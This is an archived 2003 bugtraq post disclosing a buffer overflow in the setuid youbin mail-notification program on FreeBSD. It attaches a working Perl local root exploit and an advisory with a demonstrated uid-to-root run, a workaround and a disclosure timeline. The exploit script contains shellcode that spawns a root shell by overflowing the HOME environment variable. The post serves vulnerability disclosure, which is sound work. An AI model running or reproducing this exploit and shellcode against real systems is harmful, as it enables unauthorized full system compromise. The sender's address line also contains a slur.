[30046] in bugtraq
youbin local root exploit + advisory
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Knud_Erik_H=F8jgaar)
Tue May 6 13:10:16 2003
Message-ID: <005001c313c9$4aee95d0$24029dd9@tuborg>
From: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard?= <address-modified-due-to-out-of-office-and-gay-antivirus-marking-perl-scripts-as-trojans---kain@ircop.dk>
To: <bugtraq@securityfocus.com>
Date: Tue, 6 May 2003 14:16:11 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_004D_01C313DA.0BD3E420"
------=_NextPart_000_004D_01C313DA.0BD3E420
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Attached documents explain all.
--
kokanin at dtors.net
------=_NextPart_000_004D_01C313DA.0BD3E420
Content-Type: application/octet-stream;
name="DSR-youbin.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="DSR-youbin.pl"
#!/usr/bin/perl
# DSR-youbin.pl - kokaninATdtors.net vs. /usr/ports/mail/youbin
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# shellcode by eSDee, he's cool
# youbin-3.4 Mail arrival notification service package
$len = 512;
$ret = pack("l",0xbfbffd68);
$nop = "\x90";
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
for ($i = 0; $i < $len - length($shellcode); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
local($ENV{'HOME'}) = $ret x 259;
system("youbin");
------=_NextPart_000_004D_01C313DA.0BD3E420
Content-Type: text/plain;
name="DSR-youbin.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="DSR-youbin.txt"
I. BACKGROUND
$ more /usr/ports/mail/youbin/pkg-descr=20
---- From README (slightly modified) ---
youbin is a kind of biff in the network age. When youbin is used, the
mail spool of a certain, specific machine (mail server) is observed to
inform the arrival of mail to a user at an arbitrary machine through
the network. On the other hands, the conventional "biff" informs only
the user who logs in at the machine on which the mail spool
resides. Combining with POP, youbin eliminates a lot of NFS mount of
mail spool directory caused by checking mail arrival.
More information is available at:
http://www.agusa.nuie.nagoya-u.ac.jp/software/agusalab/youbin/youbin-e.ht=
ml
II. DESCRIPTION
Insufficient bounds checking leads to execution of arbitrary code.=20
perl exploit follows this document.
III. ANALYSIS
Upon setting a large value for the HOME environment variable a buffer =
can be
overflowed. Since youbin is setuid root this effectively allows for a =
full
system compromise.
Example run:
$ id
uid=3D1000(kokanin) gid=3D1000(kokanin) groups=3D1000(kokanin), 0(wheel)
$ perl DSR-youbin.pl=20
# id
uid=3D0(root) gid=3D1000(kokanin) groups=3D1000(kokanin), 0(wheel)
IV. DETECTION
youbin-3.4 shipping with freebsd ports per 02/03/03, the latest =
available
at the time of writing, is known to be vulnerable.
V. WORKAROUND
# chmod -s `which youbin`
VI. VENDOR FIX
unknown
VII. CVE INFORMATION
unknown
VIII. DISCLOSURE TIMELINE
5/5/03 - FreeBSD port maintainer notified
5/5/03 - FreeBSD port maintainer replies, bug is known, apparently no =
fix
is planned at the moment
6/5/03 - public disclosure
IX. CREDIT
Knud Erik H=F8jgaard/kokanin, dtors security research
------=_NextPart_000_004D_01C313DA.0BD3E420--
